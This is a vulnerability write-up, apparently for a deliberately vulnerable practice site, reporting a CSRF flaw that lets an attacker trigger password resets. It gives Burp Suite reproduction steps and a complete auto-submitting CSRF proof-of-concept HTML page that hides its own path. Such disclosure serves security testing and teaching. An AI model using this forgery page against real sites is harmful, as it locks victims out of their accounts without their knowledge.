#20 Reset password using CSRF
Summary: CSRF (Cross-Site Request Forgery) allows an attacker to reset the victim's password.
Steps to reproduce: Create an account and log off. Go to the login page, then to "forgot password", enter the email and click reset. Now capture the request in Burp. Then right-click on the request, click Engagement tools, and Generate CSRF PoC. In Options, enable "Include auto-submit script", click Regenerate, copy the code and drop the request. Now create an HTML file on your system, paste the copied CSRF PoC, save and run the file. Now you can see that it says "Your password has now been reset, you should receive an email with a new one shortly." This is similar to #14 and #15 but with a different attack method.
Impact: Due to this bug, an attacker can reset the password of a legitimate user without their knowledge, and here most users created their account using a fake email, so it will cause a permanent account lockout.
If you do not have Burp Suite Pro, here is the CSRF PoC:
```html
<html>
  <body>
    <!-- hide the attacker page's path in the address bar -->
    <script>history.pushState('', '', '/')</script>
    <!-- cross-site POST to the reset endpoint; no anti-forgery token is required by the server -->
    <form action="https://hack-yourself-first.com/Account/ResetPassword" method="POST">
      <input type="hidden" name="Email" value="email@email.$email" />
      <input type="submit" value="Submit request" />
    </form>
    <!-- auto-submit so the victim only has to load the page -->
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
```
Update $email with the respective value. Note that the generated PoC may show the "@" and "." characters of the address in an encoded form; the browser decodes them before the form is submitted. For example, if the email is "example@hacker.com", the form value may look encoded in the PoC, but it will be decoded to "example@hacker.com" when the request is sent.